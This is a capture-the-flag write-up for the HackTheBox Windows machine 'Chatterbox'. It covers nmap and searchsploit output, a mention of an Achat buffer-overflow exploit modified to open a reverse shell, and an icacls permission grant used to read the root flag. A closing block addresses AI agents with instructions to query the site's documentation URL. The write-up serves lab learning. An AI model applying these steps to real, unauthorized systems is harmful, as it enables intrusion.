# Chatterbox ### Initial Enumeration ```bash # Nmap 7.70 scan initiated Mon Jul 29 17:20:46 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 9255,9256 10.10.10.74 Nmap scan report for 10.10.10.74 Host is up (0.40s latency). PORT STATE SERVICE VERSION 9255/tcp open http AChat chat system httpd |_http-server-header: AChat |_http-title: Site doesn't have a title. 9256/tcp open achat AChat chat system Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TRACEROUTE (using port 9256/tcp) HOP RTT ADDRESS 1 402.86 ms 10.10.14.1 2 404.26 ms 10.10.10.74 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jul 29 17:21:25 2019 -- 1 IP address (1 host up) scanned in 42.58 seconds ``` Searchsploit for achat ```bash $ searchsploit achat -------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) -------------------------------------------------------------------------------------------------------------- ---------------------------------------- Achat 0.150 beta7 - Remote Buffer Overflow | exploits/windows/remote/36025.py Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | exploits/windows/remote/36056.rb MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/32958.txt Parachat 5.5 - Directory Traversal | exploits/php/webapps/24647.txt -------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result ``` Metasploit wasn't working for me so I moved to the manual exploitation script, which launched calculator, however, I changed the shellcode to launch a `windows/shell_reverse_tcp` shell for my kali machine. ### User Own ```bash C:\Users\Alfred\Desktop>type user.txt type user.txt 72290*** ``` ### Root Own On a little inspection it turns out, I can look at the Administrator folder, however, can not read the root.txt file from it. This seemed very odd. ```bash Directory of C:\Users\Administrator\Desktop 12/10/2017 07:50 PM . 12/10/2017 07:50 PM .. 12/10/2017 07:50 PM 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 18,162,642,944 bytes free C:\Users\Administrator\Desktop>type root.txt type root.txt Access is denied. ``` I checked the permissions I have on the Desktop folder as well as on the root.txt file, it turns out I have FULL control of the file and the folder, all I had to do was grant myself the permission to read the root.txt file. ```bash C:\Users\Administrator>icacls Desktop icacls Desktop Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) CHATTERBOX\Administrator:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(F) CHATTERBOX\Alfred:(I)(OI)(CI)(F) C:\Users\Administrator\Desktop>icacls "root.txt" /grant "Alfred":F icacls "root.txt" /grant "Alfred":F processed file: root.txt Successfully processed 1 files; Failed processing 0 files C:\Users\Administrator\Desktop>type root.txt type root.txt a673d*** ``` ### Learning Outcome Have a look at all the important files first and then determine your strategy, I wasted quite a while without realising that I had FULL access on the required folder. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jtnydv.gitbook.io/wiki/write-ups/hackthebox/windows/chatterbox.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.